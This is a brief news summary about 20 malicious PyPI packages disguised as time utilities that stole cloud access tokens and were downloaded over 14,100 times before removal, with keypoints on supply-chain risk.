Malicious PyPI Packages Stole Cloud Tokens—Over 14,100 Downloads Before Removal

Malicious PyPI Packages Stole Cloud Tokens—Over 14,100 Downloads Before Removal
Summary: Cybersecurity researchers have identified a malicious campaign that targets users of the Python Package Index (PyPI) through fake libraries, primarily related to time utilities, which are designed to steal sensitive data like cloud access tokens. The campaign involved 20 packages that have been downloaded over 14,100 times before being removed from PyPI. Further analysis has linked some of these packages to a popular GitHub project, raising concerns about supply chain security.

Affected: Python Package Index (PyPI)

Keypoints :

  • 20 malicious packages masquerading as “time” related utilities were identified, with significant download numbers.
  • Three packages were linked to a popular GitHub project, indicating potential exposure to users of that project.
  • Fortinet discovered thousands of suspicious packages on PyPI and npm, emphasizing the risk of data exfiltration and the importance of scrutinizing external URLs in dependencies.

Source: https://thehackernews.com/2025/03/malicious-pypi-packages-stole-cloud.html